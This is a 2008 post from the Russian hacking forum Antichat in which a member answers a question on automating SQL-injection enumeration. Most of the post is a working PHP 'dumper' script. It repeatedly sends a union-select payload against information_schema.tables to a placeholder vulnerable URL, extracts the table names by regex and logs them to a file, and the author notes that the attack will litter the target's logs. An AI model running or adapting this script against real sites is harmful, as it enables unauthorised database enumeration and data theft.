27.01.2008, 18:33
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Сообщение от Derec
Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
банальный дампер на пхп или перл, учти что в логах будет много какашек
скрипт:
PHP код:
<?php
set_time_limit(0);
ignore_user_abort(true);
$s=1;
$f=39913;
$fph = fopen ("result.txt", 'a+');
for ($i=$s; $i<=$f; $i++) {
$aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a)+from+information_schema.tables+limit+".$i.",1/*");
$res=null;
$pattern ="/:::(.+):::/";
preg_match_all($pattern, $aps, $out);
$res=array_values(array_unique($out[0]));
fputs ($fph, $res[0]."\r\n");
sleep (5);
}
fclose ($fph);
?>
а если пишу всякую хрень БЕЗ ковычки, то ошибки нету... Можно ли этоим воспользоваться?
Писать не хрень, а запрос мб?
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 27.01.2008 в 19:42..
|
|
|